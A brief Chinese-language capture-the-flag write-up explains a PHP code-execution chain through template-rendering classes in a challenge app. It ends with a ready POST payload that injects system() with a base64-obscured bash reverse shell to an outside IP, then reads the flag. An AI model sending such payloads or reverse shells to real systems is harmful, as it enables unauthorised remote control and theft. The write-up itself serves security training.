主页代码逻辑就是自动加载class下类文件,然后动态调用一个类,并设置成员变量。最后调用类的run()方法。
看uml类图其实就大致有数该实例化哪个类了,TestView
看这几个类文件的内容,很明显的页面模板生成代码,感觉是根据YII2框架的模板渲染提取的主要逻辑
先找漏洞点,在Base类中
再去找调用链,搜索run()方法,在ListView类中
接着跟到renderContent,会去调用类中的renderSection方法,$this->template需为{test}形式,才会被正则匹配,去调用renderSection函数
renderSection函数会拼接方法名,然后调用该方法,$matches[1]
的内容就是$this->template
变量{ }内的内容
接下来的函数调用就简单了,就是些变量赋值,最后调用evaluateExpression()函数到达函数执行点
/?action=TestView
#POST传参
properties[rowHtmlOptionsExpression]=system("bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljk5LjI0Mi8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}'")&properties[template]={
TableBody}&properties[data][0]=111
直接反弹shell就行,读flag.txt提示没权限,ls -l / 看一下 使用/readflag读取即可